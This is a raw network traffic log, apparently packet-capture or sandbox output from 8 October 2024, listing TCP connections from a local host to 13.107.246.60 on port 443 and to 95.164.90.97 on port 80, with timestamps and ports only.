Oct 8, 2024 20:47:20.405138016 CEST	49758	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.405145884 CEST	443	49758	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.405232906 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.405268908 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.405467033 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.405503035 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.407572031 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.407620907 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.407815933 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.407917976 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.407943964 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.563191891 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.563996077 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.564027071 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.564692974 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.564698935 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.598676920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:20.598782063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:20.600085974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:20.605020046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:20.664771080 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.664926052 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.665019989 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.665128946 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.665146112 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.665168047 CEST	49761	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.665174961 CEST	443	49761	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.668051004 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.668097019 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:20.668262959 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.668385983 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:20.668399096 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.244820118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.245058060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.245534897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.245574951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.245601892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.245829105 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.245892048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.246478081 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.246503115 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.247148037 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.247153044 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.247198105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.250106096 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.250572920 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.250613928 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.250708103 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.251027107 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.251051903 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.251166105 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.251177073 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.251247883 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.251569033 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.251575947 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.251969099 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.252001047 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.252429008 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.252439022 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.253530025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.348388910 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.348448038 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.348602057 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.348920107 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.348938942 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.348953962 CEST	49762	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.348958969 CEST	443	49762	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.352241993 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.352309942 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.353072882 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.353125095 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.353130102 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.353221893 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.353373051 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.353395939 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.353411913 CEST	49765	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.353419065 CEST	443	49765	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.353420973 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.353435993 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.354373932 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.354433060 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.356307030 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.356339931 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.356368065 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.356445074 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.356590986 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.356600046 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.356626987 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.356642962 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.356656075 CEST	49763	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.356659889 CEST	443	49763	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.359406948 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.359438896 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.359509945 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.359668970 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.359679937 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.444936991 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.445694923 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.445719957 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.446376085 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.446382046 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.523963928 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.524032116 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.524466991 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.524467945 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.524467945 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.527915955 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.528007030 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.528112888 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.528291941 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.528311014 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.551631927 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.551687956 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.551966906 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.554701090 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.554702044 CEST	49766	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.554771900 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.554806948 CEST	443	49766	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.568033934 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.568129063 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.568231106 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.568460941 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.568495989 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.826536894 CEST	49764	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:21.826570988 CEST	443	49764	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:21.868561029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.868572950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.868578911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.868686914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.868696928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:21.868776083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.868834019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.871103048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:21.875916958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.017425060 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.018415928 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.018440962 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.019058943 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.019066095 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.025947094 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.026299953 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.026335001 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.026766062 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.026772022 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.029161930 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.029464960 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.029496908 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.030052900 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.030059099 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.117506981 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.117561102 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.117793083 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.118032932 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.118050098 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.118062019 CEST	49768	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.118069887 CEST	443	49768	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.122149944 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.122186899 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.122287035 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.122514963 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.122526884 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.127337933 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.127547979 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.127612114 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.127685070 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.127700090 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.127712965 CEST	49769	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.127717018 CEST	443	49769	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.130533934 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.130564928 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.130656004 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.130816936 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.130831003 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.151401997 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.151449919 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.151637077 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.152035952 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.152035952 CEST	49767	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.152059078 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.152072906 CEST	443	49767	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.155137062 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.155158043 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.155225992 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.155411005 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.155419111 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.175035954 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.175546885 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.175564051 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.176172972 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.176177025 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.261358976 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.261945963 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.261970997 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.262593985 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.262603045 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.273937941 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.274091005 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.274169922 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.274285078 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.274328947 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.274359941 CEST	49770	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.274375916 CEST	443	49770	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.277858973 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.277952909 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.278044939 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.278223038 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.278261900 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.365569115 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.365627050 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.365746021 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.365989923 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.366039991 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.366070032 CEST	49771	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.366086960 CEST	443	49771	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.369462967 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.369558096 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.369663954 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.369848013 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.369882107 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.496416092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.496634960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:22.613893986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:22.613949060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:22.619086027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.619231939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.619241953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.619251966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.619287014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.619589090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.619738102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:22.773160934 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.777146101 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.777209044 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.777842999 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.777858019 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.799156904 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.799678087 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.799700022 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.800302982 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.800307989 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.802582979 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.803023100 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.803039074 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.803616047 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.803621054 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.875893116 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.875947952 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.876028061 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.877470970 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.877490997 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.877509117 CEST	49772	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.877516031 CEST	443	49772	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.881205082 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.881299019 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.881392956 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.881680965 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.881710052 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.906765938 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.906836033 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.906956911 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.907212019 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.907224894 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.907239914 CEST	49773	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.907246113 CEST	443	49773	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.909959078 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.910011053 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.910089016 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.910778999 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.910792112 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.910866022 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.911103964 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.911104918 CEST	49774	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.911128044 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.911139965 CEST	443	49774	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.929990053 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.930001020 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.932018042 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.932111979 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.932226896 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.932405949 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.932434082 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.941916943 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.942570925 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.942579985 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:22.943213940 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:22.943218946 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.016184092 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.016908884 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.016947031 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.017534971 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.017543077 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.042121887 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.042263985 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.042356968 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.042903900 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.042924881 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.042942047 CEST	49775	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.042949915 CEST	443	49775	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.046664000 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.046706915 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.046792030 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.046962976 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.046978951 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.119581938 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.119632959 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.119803905 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.120043039 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.120057106 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.120071888 CEST	49776	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.120078087 CEST	443	49776	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.123294115 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.123327017 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.123480082 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.123702049 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.123713017 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.392240047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.392335892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.394754887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.399545908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.525672913 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.526535034 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.526567936 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.527232885 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.527239084 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.598928928 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.599628925 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.603102922 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.603184938 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.603959084 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.603972912 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.604444981 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.604496956 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.605047941 CEST	49779	443	192.168.2.5	13.107.246.60
